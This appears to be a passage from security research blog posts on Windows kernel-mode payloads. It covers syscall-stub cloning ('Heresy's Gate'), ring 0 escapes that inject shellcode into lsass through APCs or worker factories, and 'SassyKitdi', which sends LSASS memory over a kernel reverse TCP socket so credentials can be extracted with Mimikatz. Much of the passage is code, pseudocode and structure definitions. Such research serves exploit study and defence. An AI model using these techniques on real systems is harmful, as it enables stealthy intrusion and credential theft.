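A portable sketch of how such a mask might be applied is shown below. The names `scan_mask` and `extract_syscall_number` are hypothetical, 0xff is treated as the wildcard as above (so a literal 0xff byte cannot be expressed in the mask), and the scan is bounded by a caller-supplied length.

```c
#include <stddef.h>
#include <stdint.h>

#define WILDCARD 0xff

/* Returns the offset of the first position where every non-wildcard
 * mask byte equals the buffer byte, or -1 if there is no match. */
static long scan_mask(const uint8_t *buf, size_t len,
                      const uint8_t *mask, size_t mask_len)
{
    if (mask_len == 0 || mask_len > len)
        return -1;
    for (size_t i = 0; i + mask_len <= len; i++) {
        size_t j = 0;
        while (j < mask_len && (mask[j] == WILDCARD || mask[j] == buf[i + j]))
            j++;
        if (j == mask_len)
            return (long)i;
    }
    return -1;
}

/* Finds `mov eax, 0x0000????` in a stub and returns the 16-bit
 * immediate, or -1 if the instruction is not found. */
static long extract_syscall_number(const uint8_t *stub, size_t len)
{
    static const uint8_t mask[] = {0xb8, 0xff, 0xff, 0x00, 0x00};
    long off = scan_mask(stub, len, mask, sizeof mask);

    if (off < 0)
        return -1;
    return stub[off + 1] | (stub[off + 2] << 8);  /* little-endian imm16 */
}
```

In practice the scan length should be kept small, so that the match cannot wander into the next function's stub.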
    

    Dynamically Cloning a Zw Call 

    So we have the opcode from the user-mode stub, now we need to create the kernel-mode stub to call it. We can accomplish this by cloning an existing stub.

    ZwReadFile() is pretty generic, so let's go with that.

    The MOV EAX instruction right before the final JMP is the syscall opcode. We'll have to overwrite it with our desired opcode.

    Fixing nt!KiService* Relative 32 Addresses 

    So, the LEA and JMP instructions use relative 32-bit addressing. That means it is a hardcoded offset within +/-2GB of the end of the instruction.

    Converting the relative 32 address to its 64-bit full address is pretty simple code:

    static inline
    PVOID NTAPI
    ConvertRelative32AddressToAbsoluteAddress(
        _In_reads_(4) PUINT32 Relative32StartAddress
    )
    {
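        // rel32 displacements are signed; read as INT32 so that targets
        // located before the instruction resolve correctly
        INT32 Offset = *(INT32 *)Relative32StartAddress;
        PUCHAR InstructionEndAddress = 
            (PUCHAR)Relative32StartAddress + 4;
    
        return InstructionEndAddress + Offset;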
    }
    

    Since our little stub will not be within +/- 2GB space, we'll have to replace the LEA with a MOVABS, and the JMP (rel32) with a JMP [$+0].

    I checked that this mask is stable to at least Windows 7, and probably way earlier.

    UCHAR KiServiceLinkageScanMask[] =
    "\x50"                          // 50   push    rax
    "\x9c"                          // 9c   pushfq
    "\x6a\x10"                      // 6a 10  push    10h
    "\x48\x8d\x05\x00\x00\x00\x00"; // 48 8d 05 ?? ?? ?? ?? 
                                    // lea rax, [nt!KiServiceLinkage]
    
    UCHAR KiServiceInternalScanMask[] =
    "\x50"                  // 50             push rax
    "\xb8\x00\x00\x00\x00"  // b8 ?? ?? ?? ?? mov  eax, ??
    "\xe9\x00\x00\x00\x00"; // e9 ?? ?? ?? ?? jmp  nt!KiServiceInternal
    

    Create a Heretic Call Stub 

    So now that we've scanned all the offsets we can perform a copy. Allocate the stub, keeping in mind our new stub will be larger because of the MOVABS and JMP [$+0] we are adding. You'll have to do a couple of memcpy's using the mask scan offsets where we are going to replace the LEA and JMP rel-32 instructions. This clone step is only mildly annoying, but easy to mess up.

    Next perform the following fixups:

    1. Overwrite the syscall opcode
    2. Change the LEA relative-32 to a MOVABS instruction
    3. Change the JMP relative-32 to a JMP [$+0]
    4. Place the nt!KiServiceInternal pointer at $+0

    Now just cast it to a function pointer and call it!
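The replacement instruction bytes for those fixups can be sketched in C. The helper names are hypothetical, and the sketch only emits bytes into a caller-provided buffer; allocating executable memory and copying the rest of the cloned stub are left out.

```c
#include <stddef.h>
#include <stdint.h>

static void put_le(uint8_t *out, uint64_t value, size_t bytes)
{
    for (size_t i = 0; i < bytes; i++)
        out[i] = (uint8_t)(value >> (8 * i));
}

/* Fixup 1: overwrite the imm32 of an existing `mov eax, imm32` (b8 ...).
 * mov_eax must point at the b8 opcode byte. */
static void patch_syscall_number(uint8_t *mov_eax, uint32_t number)
{
    put_le(mov_eax + 1, number, 4);
}

/* Fixup 2: `movabs rax, imm64` (48 b8 imm64) in place of the 7-byte
 * `lea rax, [rip+rel32]`. Returns the number of bytes written (10). */
static size_t emit_movabs_rax(uint8_t *out, uint64_t address)
{
    out[0] = 0x48;
    out[1] = 0xb8;
    put_le(out + 2, address, 8);
    return 10;
}

/* Fixups 3 and 4: `jmp qword ptr [rip+0]` (ff 25 00 00 00 00) followed
 * directly by the 8-byte target pointer. Returns bytes written (14). */
static size_t emit_jmp_abs(uint8_t *out, uint64_t target)
{
    static const uint8_t jmp_rip0[6] = {0xff, 0x25, 0x00, 0x00, 0x00, 0x00};

    for (size_t i = 0; i < sizeof jmp_rip0; i++)
        out[i] = jmp_rip0[i];
    put_le(out + 6, target, 8);
    return 14;
}
```

The size difference is why the clone needs a larger allocation: the LEA grows from 7 to 10 bytes and the JMP from 5 to 14.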

    Work Out 

    The Windows 10 Executive does now export some interesting functions like RtlCreateUserThread (no Heresy needed!), so an ultramodern payload likely has it easy. This was not the case when I checked the Windows 7 Executive (I did not check 8).

    Heresy's Gate techniques get you access to ZwCreateThread(Ex). You could also build out a ThreadContinue primitive using ZwSetContextThread. Also, PsSetContextThread is readily exported.

    Well Known Ring 0 Escapes 

    I will describe a new method for escaping with Worker Factories, but first let's gloss over the existing methodologies being used.

    Queuing a User Mode APC 

    Right now, all the hot exploits, malwares, and antiviruses seem to always be queuing user-mode Asynchronous Procedure Calls (APCs).

    As far as I can tell, it's because sleepya_ copypasta'd me (IMPORTANT: no disrespect whatsoever, everyone in this copypasta chain made MASSIVE improvements to each other) and I copypasta'd the Equation Group who copypasta'd Barnaby Jack, and people just use the available method because it's off-the-shelf code.

    I originally got the idea from Luke Jennings' writeup on DoublePulsar's process injection, and through further analysis optimized a few things, including reducing the overall shellcode size to 14.41% of the original size.

    APCs are a very complicated topic and I don't want to get too in the weeds. At a high level, they are how I/O callbacks can return data back to usermode, asynchronously without blocking. You can think of it like the heart of the Windows epoll/kqueue methods. Essentially, they help form a proactor (vs. reactor) pattern that fixed NT creator David Cutler's issues with Unix.

    He expressed his low opinion of the Unix process input/output model by reciting "Get a byte, get a byte, get a byte byte byte" to the tune of the finale of Rossini's William Tell Overture.[citation needed]

    It's worth noting that Linux (like basically all modern operating systems) now has proactor pattern I/O facilities.

    At any rate, the pseudo-code workflow is as follows:

    target_thread = ...
    
    KeInitializeApc(
        &apc,
        target_thread,
        mode = both, 
        kernel_func = &kapc, 
        user_func = NOT_NULL
    );
    
    KeInsertQueueApc(&apc);  
    
    --- ring 0 apc ---
    
    kapc:
    mov cr8, PASSIVE_LEVEL
    
    *NormalRoutine = ZwAllocateVirtualMemory(RWX)
    _memcpy(*NormalRoutine, user_start)
    
    mov cr8, APC_LEVEL
    
    --- ring 3 apc ---
    
    user_start:
    CreateThread(&calc_shellcode)
    
    calc_shellcode:
    
    1. Find an Alertable + Waiting State thread.
    2. Create an APC on the thread.
    3. Queue the APC.
    4. In kernel routine, drop IRQL and allocate payload for the user-mode NormalRoutine.
    5. In user mode, spawn a new thread from the one we hijacked.

    There's even more plumbing going on under the hood and it's actually a pretty complicated process. Do note that at least all required functions are readily exported. You can also do it without a kernel-mode APC, so you don't have to manually adjust the IRQL (however the methodology introduces its own complexities).

    Also note that the target thread not only needs to be Alertable, it needs to be in a Waiting State, which is fairly hard to check in a cross-version way. You can DKOM traverse EPROCESS.ThreadListHead backwards as non-Alertable threads are always the first ones. If the thread is not in a Waiting State, the call to KeInsertQueueApc will return an NT error. The injected process will also crash if TEB.ActivationContextStackPointer is NULL.
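
    The backwards walk can be sketched in portable C against a mock list. The LIST_ENTRY shape and the CONTAINING_RECORD macro mirror the WDK definitions, but MOCK_THREAD and its alertable/waiting flags are hypothetical stand-ins: the real ETHREAD/KTHREAD offsets differ per Windows build and would have to be resolved separately.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Same shape as the WDK LIST_ENTRY: a node in a circular doubly linked list. */
typedef struct LIST_ENTRY {
    struct LIST_ENTRY *Flink;
    struct LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Recover the enclosing structure from a pointer to its embedded field. */
#define CONTAINING_RECORD(addr, type, field) \
    ((type *)((char *)(addr) - offsetof(type, field)))

/* Hypothetical stand-in for ETHREAD; the real layout varies by build. */
typedef struct MOCK_THREAD {
    int        id;
    bool       alertable;
    bool       waiting;
    LIST_ENTRY ThreadListEntry;
} MOCK_THREAD;

void list_init(LIST_ENTRY *head) {
    head->Flink = head->Blink = head;
}

void list_insert_tail(LIST_ENTRY *head, LIST_ENTRY *entry) {
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

/* Walk from the tail towards the head (Blink direction) and return the
 * first thread that is both alertable and waiting, or NULL if none is. */
MOCK_THREAD *find_apc_target(LIST_ENTRY *head) {
    assert(head != NULL);
    for (LIST_ENTRY *e = head->Blink; e != head; e = e->Blink) {
        MOCK_THREAD *t = CONTAINING_RECORD(e, MOCK_THREAD, ThreadListEntry);
        if (t->alertable && t->waiting)
            return t;
    }
    return NULL;
}
```

    Starting at the tail simply reaches the likely candidates sooner; a NULL result means no thread qualified and the caller should retry or pick another process.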

    I believe a more verbose version of the technique was first described in 2005 by Barnaby Jack in the paper Remote Windows Kernel Exploitation: Step Into the Ring 0. The technique may have been known before 2005; however, this is not documented functionality, so it would be rare for a normal driver writer to have stumbled on it. Matt Suiche attempted to document the history of the APC technique and reached a similar finding, with Barnaby Jack as the original discoverer.

    Driver code that implements the APC technique to inject a DLL into a process from the kernel is provided by Petr Beneš. There's also a writeup with some C code in the Vault7 leak.

    The method is also available in x64 assembly in places such as the Metasploit BlueKeep exploit; sleepya_ and I have (noncollaboratively) built upon each other's work over the past few years to improve the payload. Indeed, this shellcode is the basis for the SMBGhost exploits released by both ZecOps and chompie1337.

    This abuse of APC queuing has been such a thorn in Microsoft's side that they added ETW tracing for antivirus to it: on more recent versions, the tail end of NtQueueApcThreadEx() calls EtwTiLogQueueApcThread(). There have been some documented bypasses. There have also been issues in SMBGhost where CFG didn't like the user mode APC start address, which hugeh0ge found a workaround for.

    SharedUserData SystemCall Hook (+ Others) 

    APCs are one of several methods described by bugcheck and skape in Uninformed's Windows Kernel-Mode Payload Fundamentals. Another is called SharedUserData SystemCall Hook.

    The only exploit prior to EternalBlue in Metasploit that required this type of kernel mode payload was MS09-050, in x86 shellcode only.

    Stephen Fewer had a writeup of how the MS09-050 Metasploit shellcode performed this system call hook.

    1. Hook syscall MSR.
    2. Wait for desired process to make a syscall.
    3. Allocate the payload.
    4. Overwrite the user-mode return address for the syscall so that it points at the desired payload.

    There's a bit of glue required to fix up the hijacked thread.

    Worker Factory Internals 

    Why Worker Factories? They're ETW detecting us with APCs, dog; it's time to evolve.

    I was originally investigating Worker Factories as a potential user mode process migration technique that avoided the CreateRemoteThread() and QueueUserApc() primitives (and many similar well-known methods).

    I discovered you cannot create a Worker Factory in another process. However, in Windows 10 all processes that load ntdll receive a thread pool (to speed up loading DLLs or something), and thus implicitly have a Worker Factory!

    I was able to mess with the properties of this default Worker Factory, but I did not readily see a way to update the start routine for threads in the pool. I also saw some pointers in NTDLL thread pool functions which perhaps could be adjusted to get the process migration to pop. More research is needed.

    I instead decided to try it as a Ring 0 escape, and here we are.

    NTDLL Thread Pool Implementation 

    Worker Factories are handles that ntdll communicates with when you use the Thread Pool APIs. These essentially just let you have user-mode work queues that you can post tasks to. Most of the logic is inside ntdll, with the function prefixes Tp and Tpp. This is good, because it means the environment can be adjusted without a context switch, and generally adding additional complexity to kernels should be avoided when possible.

    It is very easy to create a worker factory, and a process can have many of them. The Windows Internals book has a few pages on them (here is an excerpt from the older 5th edition).

    The entire kernel mode API is implemented with the following syscalls:

    1. ZwCreateWorkerFactory()
    2. ZwQueryInformationWorkerFactory()
    3. ZwSetInformationWorkerFactory()
    4. ZwWaitForWorkViaWorkerFactory()
    5. ZwWorkerFactoryWorkerReady()
    6. ZwReleaseWorkerFactoryWorker()
    7. ZwShutdownWorkerFactory()

    As ntdll does all the heavy lifting, nothing in the kernel interacts with these functions. As such they are not exported, and require Heresy's Gate.

    ntdll creates a worker factory, adjusts its parameters such as minimum threads, and uses the other syscalls to inform the kernel that tasks are ready to be run. Worker threads will eat the user-mode work queues to exhaustion before returning to the kernel to wait to be explicitly released again.

    The main takeaway so far is: the kernel creates and manages the threads. ntdll manages the work items in the queue.

    Creating a Worker Factory 

    The create syscall has the following prototype:

    NTSTATUS NTAPI
    ZwCreateWorkerFactory(
        _Out_ PHANDLE WorkerFactoryHandleReturn,
        _In_ ACCESS_MASK DesiredAccess,
        _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
        _In_ HANDLE CompletionPortHandle,
        _In_ HANDLE WorkerProcessHandle,
        _In_ PVOID StartRoutine,
        _In_opt_ PVOID StartParameter,
        _In_opt_ ULONG MaxThreadCount,
        _In_opt_ SIZE_T StackReserve,
        _In_opt_ SIZE_T StackCommit
    );
    

    The most interesting parameters for us are StartRoutine and StartParameter: the Ring 3 code we wish to execute, and anything we want to pass to it directly.

    The WorkerProcessHandle parameter accepts the generic "current process" handle of -1, so there is no need to create a proper handle for the process if you are already in the same process context. In kernel mode, this means using KeStackAttachProcess(). As I mentioned earlier, you cannot create a Worker Factory for another process.

    The reverse engineered pseudocode is:

    ObpReferenceObjectByHandleWithTag(
        WorkerProcessHandle, 
        ...,
        PsProcessType, 
        &Process
    );
    
    if (KeGetCurrentThread()->ApcState.Process != Process)
    {
        return STATUS_INVALID_PARAMETER;
    }
    

    The create function also requires an I/O completion port. This can be gained using ZwCreateIoCompletion(), which is a readily exported function by the Executive.

    You also must specify some access rights for the WorkerFactoryHandle:

    #define WORKER_FACTORY_RELEASE_WORKER 0x0001
    #define WORKER_FACTORY_WAIT 0x0002
    #define WORKER_FACTORY_SET_INFORMATION 0x0004
    #define WORKER_FACTORY_QUERY_INFORMATION 0x0008
    #define WORKER_FACTORY_READY_WORKER 0x0010
    #define WORKER_FACTORY_SHUTDOWN 0x0020
    
    #define WORKER_FACTORY_ALL_ACCESS ( \
        STANDARD_RIGHTS_REQUIRED | \
        WORKER_FACTORY_RELEASE_WORKER | \
        WORKER_FACTORY_WAIT | \
        WORKER_FACTORY_SET_INFORMATION | \
        WORKER_FACTORY_QUERY_INFORMATION | \
        WORKER_FACTORY_READY_WORKER | \
        WORKER_FACTORY_SHUTDOWN \
        )
    

    greetz to Process Hacker for the reversing of these definitions. However, these evaluate to 0xF003F, and the modern Windows 10 ntdll creates with the mask: 0xF00FF. We only really need WORKER_FACTORY_SET_INFORMATION, but passing a totally full mask shouldn't be an issue (even on older versions).
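
    The arithmetic behind those two masks is easy to check. The sketch below repeats the definitions above and assumes STANDARD_RIGHTS_REQUIRED is 0x000F0000, as in winnt.h; the helper names and NTDLL_WIN10_WORKER_FACTORY_MASK are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define STANDARD_RIGHTS_REQUIRED 0x000F0000u  /* value from winnt.h */

#define WORKER_FACTORY_RELEASE_WORKER    0x0001u
#define WORKER_FACTORY_WAIT              0x0002u
#define WORKER_FACTORY_SET_INFORMATION   0x0004u
#define WORKER_FACTORY_QUERY_INFORMATION 0x0008u
#define WORKER_FACTORY_READY_WORKER      0x0010u
#define WORKER_FACTORY_SHUTDOWN          0x0020u

#define WORKER_FACTORY_ALL_ACCESS ( \
    STANDARD_RIGHTS_REQUIRED | \
    WORKER_FACTORY_RELEASE_WORKER | \
    WORKER_FACTORY_WAIT | \
    WORKER_FACTORY_SET_INFORMATION | \
    WORKER_FACTORY_QUERY_INFORMATION | \
    WORKER_FACTORY_READY_WORKER | \
    WORKER_FACTORY_SHUTDOWN \
    )

/* Mask the Windows 10 ntdll was seen to use, per the text (name is made up). */
#define NTDLL_WIN10_WORKER_FACTORY_MASK 0x000F00FFu

/* Nonzero when every bit of `rights` is present in `mask`. */
int has_rights(uint32_t mask, uint32_t rights) {
    assert(rights != 0);  /* an empty request is a caller bug */
    return (mask & rights) == rights;
}

/* Bits set in `observed` that the named rights above do not account for. */
uint32_t unnamed_access_bits(uint32_t observed) {
    return observed & ~(uint32_t)WORKER_FACTORY_ALL_ACCESS;
}
```

    The named rights OR together to 0xF003F, and the two extra bits in the ntdll mask are 0x40 and 0x80, whose meaning is not covered by these definitions.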

    Adjusting Worker Factory Minimum Threads 

    By default, it appears just creating a Worker Factory does not immediately gain you any new threads in the target process.

    However, you can tune the minimum number of threads with the following function:

    NTSTATUS WINAPI
    NtSetInformationWorkerFactory(
        _In_ HANDLE WorkerFactoryHandle,
        _In_ ULONG WorkerFactoryInformationClass,
        _In_ PVOID WorkerFactoryInformation,
        _In_ ULONG WorkerFactoryInformationLength
    );

    The enumeration of options:

    typedef enum _WORKERFACTORYINFOCLASS
    {
        WorkerFactoryTimeout, // q; s: LARGE_INTEGER
        WorkerFactoryRetryTimeout, // q; s: LARGE_INTEGER
        WorkerFactoryIdleTimeout, // q; s: LARGE_INTEGER
        WorkerFactoryBindingCount,
        WorkerFactoryThreadMinimum, // q; s: ULONG
        WorkerFactoryThreadMaximum, // q; s: ULONG
        WorkerFactoryPaused, // ULONG or BOOLEAN
        WorkerFactoryBasicInformation, // WORKER_FACTORY_BASIC_INFORMATION
        WorkerFactoryAdjustThreadGoal,
        WorkerFactoryCallbackType,
        WorkerFactoryStackInformation, // 10
        WorkerFactoryThreadBasePriority,
        WorkerFactoryTimeoutWaiters, // since THRESHOLD
        WorkerFactoryFlags,
        WorkerFactoryThreadSoftMaximum,
        WorkerFactoryThreadCpuSets, // since REDSTONE5
        MaxWorkerFactoryInfoClass
    } WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;
    

    Shout out again to Process Hacker for providing us with these definitions.
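
    As a rough illustration, raising the thread minimum comes down to one call with the WorkerFactoryThreadMinimum class (index 4 in the enumeration) and a pointer to a ULONG. The sketch below uses minimal stand-in typedefs so it builds outside a Windows toolchain, omits the NTAPI calling convention, and takes the syscall as a function pointer; set_min_threads and the recording stub are hypothetical helpers, not part of any real API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Minimal stand-ins for the Windows types so the sketch builds anywhere. */
typedef int32_t  NTSTATUS;
typedef uint32_t ULONG;
typedef void    *HANDLE;
typedef void    *PVOID;

#define STATUS_SUCCESS ((NTSTATUS)0)

/* Index 4 in the WORKERFACTORYINFOCLASS enumeration. */
enum { WorkerFactoryThreadMinimum = 4 };

/* Pointer type for the syscall; in a payload the address would have to be
 * located at run time, since the Executive does not export it. */
typedef NTSTATUS (*SET_INFO_WORKER_FACTORY_FN)(
    HANDLE WorkerFactoryHandle,
    ULONG  WorkerFactoryInformationClass,
    PVOID  WorkerFactoryInformation,
    ULONG  WorkerFactoryInformationLength);

/* Ask the kernel to keep at least `min_threads` workers alive. */
NTSTATUS set_min_threads(SET_INFO_WORKER_FACTORY_FN set_info,
                         HANDLE factory, ULONG min_threads) {
    assert(set_info != NULL);
    return set_info(factory, WorkerFactoryThreadMinimum,
                    &min_threads, (ULONG)sizeof(min_threads));
}

/* Recording stub, used only to exercise the helper off-target. */
struct recorded_call { ULONG info_class, value, length; };
struct recorded_call g_last_call;

NTSTATUS stub_set_info(HANDLE h, ULONG cls, PVOID info, ULONG len) {
    (void)h;
    g_last_call.info_class = cls;
    g_last_call.value      = *(ULONG *)info;
    g_last_call.length     = len;
    return STATUS_SUCCESS;
}
```

    Calling set_min_threads(stub_set_info, NULL, 1) shows what reaches the syscall: class 4, a 4-byte buffer, and the value 1.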

    Step Into the Ring 3 

    The pseudo-code workflow for Work Out is as follows:

    PsLookupProcessByProcessId(pid, &lsass)
    
        KeStackAttachProcess(lsass)
    
            start_addr = ZwAllocateVirtualMemory(RWX)
            _memcpy(start_addr, shellcode)
    
            ZwCreateIoCompletion(&hio)
    
            __ZwCreateWorkerFactory(&hWork, hio, start_addr)
    
            __ZwSetInformationWorkerFactory(hWork, min_threads = 1)
      
        KeUnstackDetachProcess(lsass)
    
    ObDereferenceObject(lsass)
    
    1. Attach to the process.
    2. Allocate the user mode payload.
    3. Create an I/O completion handle.
    4. Create a worker factory with the start routine being the payload.
    5. Adjust minimum threads to 1.

    See inect.c in the PoC code on GitHub.

    Conclusion 

    I have left other ideas in this post for Ring 0 Escapes that may be worth PROOFing out, as an open problem for the reader.

    If you think of other techniques for Heresy's Gate or Ring 0 Escapes, or just want to troll me, be sure to leave a comment!

    SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump

    15 August 2020 at 22:58

    Introduction

    This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). This payload is of a nature that can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, i.e. bad drivers. This exploit payload is universal from (at least) Windows 2000 to Windows 10, and without having to carry around weird DKOM offsets.

    The payload has 0 interaction with user-mode, and creates a reverse TCP socket using the Transport Driver Interface (TDI), a precursor to the more modern Winsock Kernel (WSK). The LSASS.exe process memory and modules are then sent over the wire where they can be transformed into a minidump file on the attacker's end and passed into a tool such as Mimikatz to extract credentials.

    tl;dr: PoC || GTFO GitHub

    The position-independent shellcode is ~3300 bytes and written entirely in the Rust programming language, using many of its high level abstractions. I will outline some of the benefits of Rust for all future shellcoding needs, and precautions that need to be taken.

    Figure 0: An oversimplification of the SassyKitdi methodology.

    I don't have every AV on hand to test against obviously, but given that most AV misses obvious user-mode stuff thrown at it, I can only assume that currently available antivirus is almost universally ineffective at detecting this methodology.

    Finally, I will discuss what future kernel-mode rootkits could look like, if one took this example a couple of steps further. What's old is new again.

    Transport Driver Interface

    TDI is an old school method to talk to all types of network transports. In this case it will be used to create a reverse TCP connection back to the attacker. Other payloads such as Bind Sockets, as well as UDP, would follow a similar methodology.

    The use of TDI in rootkits is not exactly widespread, but it has been documented in the following books which served as references for this code:

    • Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
    • Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

    Opening the TCP Device Object

    TDI device objects are found by their device name, in our case \Device\Tcp. Essentially, you use the ZwCreateFile() kernel API with the device name, and pass options in through the use of our old friend File Extended Attributes.

    pub type ZwCreateFile = extern "stdcall" fn(
        FileHandle:         PHANDLE,
        AccessMask:         ACCESS_MASK,
        ObjectAttributes:   POBJECT_ATTRIBUTES,
        IoStatusBlock:      PIO_STATUS_BLOCK,
        AllocationSize:     PLARGE_INTEGER,
        FileAttributes:     ULONG,
        ShareAccess:        ULONG,
        CreateDisposition:  ULONG,
        CreateOptions:      ULONG,
        EaBuffer:           PVOID,
        EaLength:           ULONG,
    ) -> NTSTATUS;
    

    The device name is passed in the ObjectAttributes field, and the configuration is passed in the EaBuffer. We must create a Transport handle (FEA: TransportAddress) and a Connection handle (FEA: ConnectionContext).

    The TransportAddress FEA takes a TRANSPORT_ADDRESS structure, which for IPv4 consists of a few other structures. It is at this point that we can choose which interface to bind to, or which port to use. In our case, we will choose 0.0.0.0 with port 0, and the kernel will bind us to the main interface with a random ephemeral port.

    #[repr(C, packed)]
    pub struct TDI_ADDRESS_IP {
        pub sin_port:   USHORT,
        pub in_addr:    ULONG,
        pub sin_zero:   [UCHAR; 8],
    }
    
    #[repr(C, packed)]
    pub struct TA_ADDRESS {
        pub AddressLength:  USHORT,
        pub AddressType:    USHORT,
        pub Address:        TDI_ADDRESS_IP,
    }
    
    #[repr(C, packed)]
    pub struct TRANSPORT_ADDRESS {
        pub TAAddressCount:     LONG,
        pub Address:            [TA_ADDRESS; 1],
    }
    

    The ConnectionContext FEA allows setting of an arbitrary context instead of a defined struct. In the example code we just set this to NULL and move on.

    At this point we have created the Transport Handle, Transport File Object, Connection Handle, and Connection File Object.
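
    For reference, the wildcard TransportAddress (0.0.0.0, port 0) described earlier in this section can be laid out in C roughly as follows. The structs mirror the packed Rust definitions above rather than the WDK headers, TDI_ADDRESS_TYPE_IP is assumed to be 2 as in tdi.h, and init_transport_address is a made-up helper name.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TDI_ADDRESS_TYPE_IP 2   /* value from tdi.h */

#pragma pack(push, 1)
typedef struct {
    uint16_t sin_port;      /* network byte order */
    uint32_t in_addr;       /* network byte order */
    uint8_t  sin_zero[8];
} TDI_ADDRESS_IP;

typedef struct {
    uint16_t       AddressLength;  /* size of Address only, not the header */
    uint16_t       AddressType;
    TDI_ADDRESS_IP Address;
} TA_ADDRESS;

typedef struct {
    int32_t    TAAddressCount;
    TA_ADDRESS Address[1];
} TRANSPORT_ADDRESS;
#pragma pack(pop)

/* Fill `ta` for a single IPv4 endpoint. Passing 0 for both values gives the
 * wildcard 0.0.0.0:0 used when opening the local Transport handle. */
void init_transport_address(TRANSPORT_ADDRESS *ta,
                            uint32_t addr_be, uint16_t port_be) {
    assert(ta != NULL);
    memset(ta, 0, sizeof(*ta));
    ta->TAAddressCount              = 1;
    ta->Address[0].AddressLength    = (uint16_t)sizeof(TDI_ADDRESS_IP);
    ta->Address[0].AddressType      = TDI_ADDRESS_TYPE_IP;
    ta->Address[0].Address.in_addr  = addr_be;
    ta->Address[0].Address.sin_port = port_be;
}
```

    With 1-byte packing the whole structure is 22 bytes: a 4-byte count, a 4-byte address header, and the 14-byte IPv4 address.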

    Connecting to an Endpoint

    After initial setup, the rest of the TDI API is performed through IOCTLs to the device object associated with our File Objects.

    TDI uses IRP_MJ_INTERNAL_DEVICE_CONTROL with various minor codes. The ones we are interested in are:

    #[repr(u8)]
    pub enum TDI_INTERNAL_IOCTL_MINOR_CODES {
        TDI_ASSOCIATE_ADDRESS     = 0x1,
        TDI_CONNECT               = 0x3,
        TDI_SEND                  = 0x7,
        TDI_SET_EVENT_HANDLER     = 0xb,
    }
    

    Each of these internal IOCTLs has various structures associated with them. The basic methodology is to:

    1. Get the Device Object from the File Object using IoGetRelatedDeviceObject()
    2. Create the internal IOCTL IRP using IoBuildDeviceIoControlRequest()
    3. Set the opcode inside IO_STACK_LOCATION.MinorFunction
    4. Copy the op's struct pointer to the IO_STACK_LOCATION.Parameters
    5. Dispatch the IRP with IofCallDriver()
    6. Wait for the operation to complete using KeWaitForSingleObject() (optional)

    For the TDI_CONNECT operation, the IRP parameters include a TRANSPORT_ADDRESS structure (defined in the previous section). This time, instead of setting it to 0.0.0.0 port 0, we set it to the address and port we want to connect to, both in big-endian (network) byte order.
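
    Because x86 is little-endian, the big-endian values look byte-swapped when written as integer constants. A small sketch of the conversion, with made-up helper names, assuming a little-endian host:

```c
#include <assert.h>
#include <stdint.h>

/* Swap the two bytes of a 16-bit value (host <-> network order on x86). */
uint16_t swap16(uint16_t v) {
    return (uint16_t)((v << 8) | (v >> 8));
}

/* Convert a port number to the constant a little-endian host must store so
 * that the bytes in memory are big-endian. */
uint16_t port_to_wire(unsigned port) {
    assert(port <= 65535u);
    return swap16((uint16_t)port);
}

/* Build the 32-bit constant whose in-memory bytes on a little-endian host
 * are a, b, c, d in that order, i.e. the dotted quad a.b.c.d on the wire. */
uint32_t ipv4_to_wire(uint8_t a, uint8_t b, uint8_t c, uint8_t d) {
    return (uint32_t)a |
           ((uint32_t)b << 8) |
           ((uint32_t)c << 16) |
           ((uint32_t)d << 24);
}
```

    For example, 192.168.1.221 becomes 0xdd01a8c0 and port 64444 (0xFBBC) becomes 0xBCFB.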

    Sending Data Over the Wire

    If the connection IRP succeeds in establishing a TCP connection, we can then send TDI_SEND IRPs to the TCP device.

    The TDI driver expects a Memory Descriptor List (MDL) that describes the buffer to send over the network.

    Assuming we want to send some arbitrary data over the wire, we must perform the following steps:

    1. ExAllocatePool() a buffer and RtlCopyMemory() the data over (optional)
    2. IoAllocateMdl() providing the buffer address and size
    3. MmProbeAndLockPages() to page in and lock the buffer for the send operation
    4. Dispatch the Send IRP
    5. The I/O manager will unlock the pages and free the MDL
    6. ExFreePool() the buffer (optional)

    In this case the MDL is attached to the IRP. In the Parameters structure we can just set SendFlags to 0 and SendLength to the data size.

    #[repr(C, packed)]
    pub struct TDI_REQUEST_KERNEL_SEND {
        pub SendLength:    ULONG,
        pub SendFlags:     ULONG,
    }
    

    Dumping LSASS from Kernel Mode

    LSASS is of course the goldmine on Windows, where prizes such as cleartext credentials and Kerberos information can be obtained. Many AV vendors are getting better at hardening LSASS against dumping from user-mode. But we'll do it from the privilege of the kernel.

    Mimikatz requires 3 streams to process a minidump: System Information, Memory Ranges, and Module List.
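
    On the receiving end these three streams sit behind a minidump header and a stream directory. The sketch below lays out just that prologue in C. It assumes the public minidump format constants (signature "MDMP", version 42899, stream types 7, 4 and 9) and that the memory ranges are stored as a Memory64ListStream; write_dump_prologue is a hypothetical helper, and the sizes and offsets of the stream data are left for the caller to fill in.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MINIDUMP_SIGNATURE 0x504D444Du  /* "MDMP" when stored little-endian */
#define MINIDUMP_VERSION   42899u

/* Stream type numbers from the MINIDUMP_STREAM_TYPE enumeration. */
enum {
    ModuleListStream   = 4,
    SystemInfoStream   = 7,
    Memory64ListStream = 9
};

typedef struct {
    uint32_t Signature;
    uint32_t Version;
    uint32_t NumberOfStreams;
    uint32_t StreamDirectoryRva;  /* file offset of the directory */
    uint32_t CheckSum;
    uint32_t TimeDateStamp;
    uint64_t Flags;
} MINIDUMP_HEADER;

typedef struct {
    uint32_t StreamType;
    uint32_t DataSize;  /* MINIDUMP_LOCATION_DESCRIPTOR.DataSize */
    uint32_t Rva;       /* MINIDUMP_LOCATION_DESCRIPTOR.Rva */
} MINIDUMP_DIRECTORY;

/* Write the header and an empty three-entry directory into `out`.
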